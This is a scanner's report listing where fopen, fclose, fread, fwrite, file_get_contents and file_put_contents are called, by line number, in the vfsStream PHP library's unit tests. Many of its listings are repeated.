    Ligne207: $this->assertFalse(@fopen($vfsFile, 'xb'));
    Ligne218: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb'));
    Ligne228: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb+'));
    Ligne238: $this->assertFalse(@fopen($this->baz2URL, 'invalid'));
    Ligne248: $fp = fopen($this->baz2URL, 'rb');
    Ligne262: $fp = fopen($this->baz2URL, 'wb');
    Ligne278: $fp = fopen($this->baz2URL, 'ab');
    Ligne295: $fp = fopen($vfsFile, 'xb');
    Ligne326: $fp = fopen($vfsFile, 'wb');
    Ligne338: $fp = fopen($vfsFile, 'cb');
    Ligne352: $fp = fopen($vfsFile, 'cb+');
    Ligne367: $fp = fopen($vfsFile, 'cb');
    Ligne380: $fp = fopen($vfsFile, 'cb');
    Ligne393: $fp = fopen($vfsFile, 'cb+');
    Ligne406: $fp = fopen($vfsFile, 'cb+');
    Ligne417: $this->assertFalse(@fopen($this->baz1URL, 'a'));
    Ligne426: $this->assertFalse(@fopen($this->baz1URL, 'w'));
    Ligne435: $this->assertFalse(@fopen($this->baz1URL, 'r'));
    file_get_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne18: * assert that file_get_contents() delivers correct file contents
    Ligne22: public function file_get_contents()
    Ligne24: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne25: $this->assertEquals('baz 1', file_get_contents($this->baz1URL));
    Ligne26: $this->assertFalse(@file_get_contents($this->barURL));
    Ligne27: $this->assertFalse(@file_get_contents($this->fooURL));
    Ligne35: public function file_get_contentsNonReadableFile()
    Ligne40: $this->assertEquals('', @file_get_contents(vfsStream::url('root/new.txt')));
    Ligne69: $this->assertEquals('This does work.', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne84: $this->assertEquals('content', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne166: $this->assertEquals('d', file_get_contents($vfsFile));
    Ligne181: $this->assertEquals('testd', file_get_contents($vfsFile));
    Ligne195: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne208: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne252: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne268: $this->assertEquals('foo', file_get_contents($this->baz2URL));
    Ligne284: $this->assertEquals('baz2foo', file_get_contents($this->baz2URL));
    Ligne301: $this->assertEquals('foo', file_get_contents($vfsFile));
    Ligne327: $this->assertEquals('', file_get_contents($vfsFile));
    Ligne342: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne356: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne368: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne394: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne455: $this->assertFalse(@file_get_contents($this->baz1URL));
    fopen was found in the file vfsStreamWrapperStreamSelectTestCase.php
    Ligne28: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    file_get_contents was found in the file vfsStreamWrapperDirSeparatorTestCase.php
    Ligne42: $this->assertEquals('test', file_get_contents('vfs://root/foo\bar\baz.txt'));
    file_get_contents was found in the file Issue104TestCase.php
    Ligne49: file_get_contents(vfsStream::url('root/foo bar/schema.xsd'))
    fopen was found in the file vfsStreamWrapperLargeFileTestCase.php
    Ligne56: $fp = fopen($this->largeFile->url(), 'rb');
    Ligne67: $fp = fopen($this->largeFile->url(), 'rb+');
    fread was found in the file vfsStreamWrapperLargeFileTestCase.php
    Ligne57: $data = fread($fp, 15);
    fclose was found in the file vfsStreamWrapperLargeFileTestCase.php
    Ligne58: fclose($fp);
    Ligne70: fclose($fp);
    fopen was found in the file vfsStreamWrapperLargeFileTestCase.php
    Ligne56: $fp = fopen($this->largeFile->url(), 'rb');
    Ligne67: $fp = fopen($this->largeFile->url(), 'rb+');
    fwrite was found in the file vfsStreamWrapperLargeFileTestCase.php
    Ligne69: fwrite($fp, 'foobarbaz');
    fclose was found in the file vfsStreamWrapperLargeFileTestCase.php
    Ligne58: fclose($fp);
    Ligne70: fclose($fp);
    fopen was found in the file vfsStreamWrapperWithoutRootTestCase.php
    Ligne51: $this->assertFalse(@fopen(vfsStream::url('foo'), 'r'));
    fclose was found in the file vfsStreamWrapperFileTimesTestCase.php
    Ligne77: fclose(fopen($this->fooUrl, 'rb'));
    Ligne119: fclose(fopen($this->fooUrl, 'wb'));
    Ligne144: fclose($fp);
    Ligne166: fclose($fp);
    file_get_contents was found in the file vfsStreamWrapperFileTimesTestCase.php
    Ligne98: file_get_contents($this->fooUrl);
    fclose was found in the file vfsStreamWrapperFileTimesTestCase.php
    Ligne77: fclose(fopen($this->fooUrl, 'rb'));
    Ligne119: fclose(fopen($this->fooUrl, 'wb'));
    Ligne144: fclose($fp);
    Ligne166: fclose($fp);
    fopen was found in the file vfsStreamWrapperFileTimesTestCase.php
    Ligne77: fclose(fopen($this->fooUrl, 'rb'));
    Ligne119: fclose(fopen($this->fooUrl, 'wb'));
    Ligne140: $fp = fopen($this->fooUrl, 'rb');
    Ligne162: $fp = fopen($this->fooUrl, 'wb');
    fread was found in the file vfsStreamWrapperFileTimesTestCase.php
    Ligne143: fread($fp, 1024);
    fclose was found in the file vfsStreamWrapperFileTimesTestCase.php
    Ligne77: fclose(fopen($this->fooUrl, 'rb'));
    Ligne119: fclose(fopen($this->fooUrl, 'wb'));
    Ligne144: fclose($fp);
    Ligne166: fclose($fp);
    fopen was found in the file vfsStreamWrapperFileTimesTestCase.php
    Ligne77: fclose(fopen($this->fooUrl, 'rb'));
    Ligne119: fclose(fopen($this->fooUrl, 'wb'));
    Ligne140: $fp = fopen($this->fooUrl, 'rb');
    Ligne162: $fp = fopen($this->fooUrl, 'wb');
    fwrite was found in the file vfsStreamWrapperFileTimesTestCase.php
    Ligne165: fwrite($fp, 'test');
    fclose was found in the file vfsStreamWrapperFileTimesTestCase.php
    Ligne77: fclose(fopen($this->fooUrl, 'rb'));
    Ligne119: fclose(fopen($this->fooUrl, 'wb'));
    Ligne144: fclose($fp);
    Ligne166: fclose($fp);
    file_put_contents was found in the file vfsStreamWrapperFileTimesTestCase.php
    Ligne180: file_put_contents($this->fooUrl, 'test');
    Ligne198: file_put_contents($this->bazUrl, 'test');
    file_put_contents was found in the file vfsStreamWrapperFileTimesTestCase.php
    Ligne180: file_put_contents($this->fooUrl, 'test');
    Ligne198: file_put_contents($this->bazUrl, 'test');
    file_put_contents was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne50: file_put_contents(vfsStream::url('root/foo.txt'), 'content');
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
